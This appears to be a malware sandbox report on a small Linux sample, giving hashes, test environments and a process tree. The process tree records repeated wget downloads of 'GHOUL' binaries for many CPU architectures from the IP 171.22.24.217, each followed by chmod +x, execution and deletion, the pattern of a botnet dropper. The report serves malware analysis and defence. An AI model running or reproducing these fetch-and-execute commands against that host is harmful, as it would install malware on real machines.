Analysis
-
max time kernel
3s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
17-06-2024 04:29
Static task
static1
Behavioral task
behavioral1
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
debian9-mipsel-20240418-en
General
-
Target
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
-
Size
1KB
-
MD5
b6c102d8d3cb13f9aa55c32b4d043966
-
SHA1
16bcb4f5e0b2def1e706ff586cd0b0f9166e4b4c
-
SHA256
315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1
-
SHA512
9bbb48a0a972c392ba938e7ec6a73ba6c20aa6ea6f2205b63801ee0069e4a0e1228c4fce3b6ddb6400c23081abb6df47b477c26b462820b19f9da01f29b54b27
Malware Config
Signatures
Processes
-
/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes1181⤵PID:1518
-
/usr/bin/wgetwget http://171.22.24.217/m-i.p-s.GHOUL2⤵PID:1519
-
-
/bin/chmodchmod +x m-i.p-s.GHOUL2⤵PID:1523
-
-
/tmp/m-i.p-s.GHOUL./m-i.p-s.GHOUL2⤵PID:1524
-
-
/bin/rmrm -rf m-i.p-s.GHOUL2⤵PID:1525
-
-
/usr/bin/wgetwget http://171.22.24.217/m-p.s-l.GHOUL2⤵PID:1526
-
-
/bin/chmodchmod +x m-p.s-l.GHOUL2⤵PID:1527
-
-
/tmp/m-p.s-l.GHOUL./m-p.s-l.GHOUL2⤵PID:1528
-
-
/bin/rmrm -rf m-p.s-l.GHOUL2⤵PID:1529
-
-
/usr/bin/wgetwget http://171.22.24.217/s-h.4-.GHOUL2⤵PID:1530
-
-
/bin/chmodchmod +x s-h.4-.GHOUL2⤵PID:1531
-
-
/tmp/s-h.4-.GHOUL./s-h.4-.GHOUL2⤵PID:1532
-
-
/bin/rmrm -rf s-h.4-.GHOUL2⤵PID:1533
-
-
/usr/bin/wgetwget http://171.22.24.217/x-8.6-.GHOUL2⤵PID:1534
-
-
/bin/chmodchmod +x x-8.6-.GHOUL2⤵PID:1535
-
-
/tmp/x-8.6-.GHOUL./x-8.6-.GHOUL2⤵PID:1536
-
-
/bin/rmrm -rf x-8.6-.GHOUL2⤵PID:1537
-
-
/usr/bin/wgetwget http://171.22.24.217/a-r.m-6.GHOUL2⤵PID:1538
-
-
/bin/chmodchmod +x a-r.m-6.GHOUL2⤵PID:1539
-
-
/tmp/a-r.m-6.GHOUL./a-r.m-6.GHOUL2⤵PID:1540
-
-
/bin/rmrm -rf a-r.m-6.GHOUL2⤵PID:1541
-
-
/usr/bin/wgetwget http://171.22.24.217/x-3.2-.GHOUL2⤵PID:1542
-
-
/bin/chmodchmod +x x-3.2-.GHOUL2⤵PID:1543
-
-
/tmp/x-3.2-.GHOUL./x-3.2-.GHOUL2⤵PID:1544
-
-
/bin/rmrm -rf x-3.2-.GHOUL2⤵PID:1545
-
-
/usr/bin/wgetwget http://171.22.24.217/a-r.m-7.GHOUL2⤵PID:1546
-
-
/bin/chmodchmod +x a-r.m-7.GHOUL2⤵PID:1547
-
-
/tmp/a-r.m-7.GHOUL./a-r.m-7.GHOUL2⤵PID:1548
-
-
/bin/rmrm -rf a-r.m-7.GHOUL2⤵PID:1549
-
-
/usr/bin/wgetwget http://171.22.24.217/p-p.c-.GHOUL2⤵PID:1550
-
-
/bin/chmodchmod +x p-p.c-.GHOUL2⤵PID:1551
-
-
/tmp/p-p.c-.GHOUL./p-p.c-.GHOUL2⤵PID:1552
-
-
/bin/rmrm -rf p-p.c-.GHOUL2⤵PID:1553
-
-
/usr/bin/wgetwget http://171.22.24.217/i-5.8-6.GHOUL2⤵PID:1554
-
-
/bin/chmodchmod +x i-5.8-6.GHOUL2⤵PID:1555
-
-
/tmp/i-5.8-6.GHOUL./i-5.8-6.GHOUL2⤵PID:1556
-
-
/bin/rmrm -rf i-5.8-6.GHOUL2⤵PID:1557
-
-
/usr/bin/wgetwget http://171.22.24.217/m-6.8-k.GHOUL2⤵PID:1558
-
-
/bin/chmodchmod +x m-6.8-k.GHOUL2⤵PID:1559
-
-
/tmp/m-6.8-k.GHOUL./m-6.8-k.GHOUL2⤵PID:1560
-
-
/bin/rmrm -rf m-6.8-k.GHOUL2⤵PID:1561
-
-
/usr/bin/wgetwget http://171.22.24.217/p-p.c-.GHOUL2⤵PID:1562
-
-
/bin/chmodchmod +x p-p.c-.GHOUL2⤵PID:1563
-
-
/tmp/p-p.c-.GHOUL./p-p.c-.GHOUL2⤵PID:1564
-
-
/bin/rmrm -rf p-p.c-.GHOUL2⤵PID:1565
-
-
/usr/bin/wgetwget http://171.22.24.217/a-r.m-4.GHOUL2⤵PID:1566
-
-
/bin/chmodchmod +x a-r.m-4.GHOUL2⤵PID:1567
-
-
/tmp/a-r.m-4.GHOUL./a-r.m-4.GHOUL2⤵PID:1568
-
-
/bin/rmrm -rf a-r.m-4.GHOUL2⤵PID:1569
-
-
/usr/bin/wgetwget http://171.22.24.217/a-r.m-5.GHOUL2⤵PID:1570
-
-
/bin/chmodchmod +x a-r.m-5.GHOUL2⤵PID:1571
-
-
/tmp/a-r.m-5.GHOUL./a-r.m-5.GHOUL2⤵PID:1572
-
-
/bin/rmrm -rf a-r.m-5.GHOUL2⤵PID:1573
-